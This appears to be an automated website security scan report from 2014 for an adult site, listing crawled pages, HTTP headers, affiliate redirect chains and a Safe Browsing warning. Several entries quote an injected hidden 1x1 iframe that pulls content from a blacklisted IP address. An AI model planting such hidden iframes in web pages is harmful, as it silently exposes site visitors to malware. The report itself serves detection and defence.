Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hotbabesz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hotbabesz.com/ | 200 OK Content-Length: 51441 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 37.9.53.204 <script language="javascript" type="text/javascript"> <!-- document.cookie='tp=MXwwfDE0MDgwNjY2NTB8MTQwODA2NjY1MHwwO25vcmVmX2lu; expires=Sat, 16 Aug 2014 01:37:30 GMT; path=/;'; document.cookie='fav=1408066650; expires=Sat, 15 Aug 2015 01:37:30 GMT; path=/;'; //--> </script> <script language="javascript" type="text/javascript"> var d; d = Math.floor(Math.random () * 10000); do ...[4823 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://37.9.53.204/mobile.php?niche=newcj This URL is marked by Google as suspicious <iframe src="http://37.9.53.204/mobile.php?niche=newcj" width=1 height=1> | ||
http://hotbabesz.com/st/st.php?id=18451&url=http://www.hotbabesz.com/sexy-legs/&p=100&b=1 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:32 GMT Location: http://www.hotbabesz.com/sexy-legs/ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Content-Length: 0 Content-Type: text/html Set-Cookie: stclick=1; expires=Sat, 16-Aug-2014 01:37:32 GMT Set-Cookie: stfirst=first_click_done; expires=Sat, 16-Aug-2014 01:37:32 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.hotbabesz.com/sexy-legs/ | 200 OK Content-Length: 74615 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 37.9.53.204 <script language="javascript" type="text/javascript"> <!-- document.cookie='tp=MXwwfDE0MDgwNjY2NTJ8MTQwODA2NjY1MnwwO25vcmVmX2lu; expires=Sat, 16 Aug 2014 01:37:32 GMT; path=/;'; document.cookie='fav=1408066652; expires=Sat, 15 Aug 2015 01:37:32 GMT; path=/;'; //--> </script> <script language="javascript" type="text/javascript"> var d; d = Math.floor(Math.random () * 10000); do ...[4559 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://37.9.53.204/mobile.php?niche=newcj This URL is marked by Google as suspicious <iframe src="http://37.9.53.204/mobile.php?niche=newcj" width=1 height=1> | ||
http://www.hotbabesz.com/ | 200 OK Content-Length: 51441 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 37.9.53.204 <script language="javascript" type="text/javascript"> <!-- document.cookie='tp=MXwwfDE0MDgwNjY2NTN8MTQwODA2NjY1M3wwO25vcmVmX2lu; expires=Sat, 16 Aug 2014 01:37:33 GMT; path=/;'; document.cookie='fav=1408066653; expires=Sat, 15 Aug 2015 01:37:33 GMT; path=/;'; //--> </script> <script language="javascript" type="text/javascript"> var d; d = Math.floor(Math.random () * 10000); do ...[4823 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://37.9.53.204/mobile.php?niche=newcj This URL is marked by Google as suspicious <iframe src="http://37.9.53.204/mobile.php?niche=newcj" width=1 height=1> | ||
http://www.hotbabesz.com/st/st.php?id=18451&url=http://www.hotbabesz.com/sexy-legs/&p=100&b=1 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:34 GMT Location: http://www.hotbabesz.com/sexy-legs/ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Content-Length: 0 Content-Type: text/html Set-Cookie: stclick=1; expires=Sat, 16-Aug-2014 01:37:34 GMT Set-Cookie: stfirst=first_click_done; expires=Sat, 16-Aug-2014 01:37:35 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.hotbabesz.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
http://www.hotbabesz.com/st/st.php?id=18457&url=http://www.hotbabesz.com/tanned-body/&p=100&b=1 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:35 GMT Location: http://www.hotbabesz.com/tanned-body/ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Content-Length: 0 Content-Type: text/html Set-Cookie: stclick=1; expires=Sat, 16-Aug-2014 01:37:35 GMT Set-Cookie: stfirst=first_click_done; expires=Sat, 16-Aug-2014 01:37:35 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.hotbabesz.com/tanned-body/ | 200 OK Content-Length: 75611 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 37.9.53.204 <script language="javascript" type="text/javascript"> <!-- document.cookie='tp=MXwwfDE0MDgwNjY2NTZ8MTQwODA2NjY1NnwwO25vcmVmX2lu; expires=Sat, 16 Aug 2014 01:37:36 GMT; path=/;'; document.cookie='fav=1408066656; expires=Sat, 15 Aug 2015 01:37:36 GMT; path=/;'; //--> </script> <script language="javascript" type="text/javascript"> var d; d = Math.floor(Math.random () * 10000); do ...[4559 bytes skipped]... Malicious iFrame found. size: 1x1 src: http://37.9.53.204/mobile.php?niche=newcj This URL is marked by Google as suspicious <iframe src="http://37.9.53.204/mobile.php?niche=newcj" width=1 height=1> | ||
http://www.hotbabesz.com/st/st.php?cat=7544&url=http://galleries.alluringvixens.com/laurenv2-blacklace/1/?ccbill=2286200&p=70 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:37 GMT Location: /tp/out.php?p=60&fc=1&url=http://galleries.alluringvixens.com/laurenv2-blacklace/1/?ccbill=2286200 Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Content-Length: 0 Content-Type: text/html Set-Cookie: stclick=1; expires=Sat, 16-Aug-2014 01:37:37 GMT Set-Cookie: stfirst=first_click_done; expires=Sat, 16-Aug-2014 01:37:37 GMT X-Powered-By: PHP/5.2.17 | clean |
http://www.hotbabesz.com/tp/out.php?p=60&fc=1&url=http://galleries.alluringvixens.com/laurenv2-blacklace/1/?ccbill=2286200 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:37 GMT Location: http://galleries.alluringvixens.com/laurenv2-blacklace/1/?ccbill=2286200 Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17 Content-Length: 0 Content-Type: text/html Set-Cookie: tp=MXwxfDE0MDgwNjY2NTd8MTQwODA2NjY1N3wxOw%3D%3D; expires=Sat, 16-Aug-2014 01:37:37 GMT; path=/ Set-Cookie: ca=gallery X-Powered-By: PHP/5.2.17 | clean |
http://galleries.alluringvixens.com/laurenv2-blacklace/1/?ccbill=2286200 | HTTP/1.1 302 Found Connection: close Date: Fri, 15 Aug 2014 01:37:38 GMT Location: http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=940521&PA=2286200&HTML=http://www.alluringvixens.com/ Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.6 | clean |
http://refer.ccbill.com/cgi-bin/clicks.cgi?ca=940521&pa=2286200&html=http://www.alluringvixens.com/ | HTTP/1.1 302 Found Date: Fri, 15 Aug 2014 01:37:38 GMT Location: http://www.alluringvixens.com/?CA=940521&PA=2286200 Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: 940521=CLICKS2xBCIFlAhPJQx9w**; expires=Sunday 17-Aug-14 18:37:38 GMT; path=/; domain=.ccbill.com X-Cnection: close | clean |
http://www.alluringvixens.com/?ca=940521&pa=2286200 | 200 OK Content-Length: 28687 Content-Type: text/html | clean |
http://www.alluringvixens.com/index.php | 200 OK Content-Length: 28683 Content-Type: text/html | clean |
http://www.alluringvixens.com/updates_p1.php | 200 OK Content-Length: 17997 Content-Type: text/html | clean |
http://www.alluringvixens.com/vixens.php | 200 OK Content-Length: 14857 Content-Type: text/html | clean |
http://www.alluringvixens.com/members/ | 200 OK Content-Length: 2615 Content-Type: text/html | clean |
http://www.alluringvixens.com/join.php | 200 OK Content-Length: 13152 Content-Type: text/html | clean |
http://www.alluringvixens.com/2257.php | 200 OK Content-Length: 2427 Content-Type: text/html | clean |
http://www.alluringvixens.com/landing/aaliyahlove.php | 200 OK Content-Length: 6321 Content-Type: text/html | clean |
http://www.alluringvixens.com/landing/alexandra.php | 200 OK Content-Length: 6315 Content-Type: text/html | clean |
http://www.alluringvixens.com/landing/allie.php | 200 OK Content-Length: 6307 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hotbabesz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Aug 2014 01:37:30 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
Content-Type: text/html
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: hotbabesz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Aug 2014 01:37:30 GMT
Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.17
Content-Type: text/html
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: hotbabesz.com
Referer: http://www.google.com/search?q=hotbabesz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hotbabesz.com
Referer: http://www.google.com/search?q=hotbabesz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.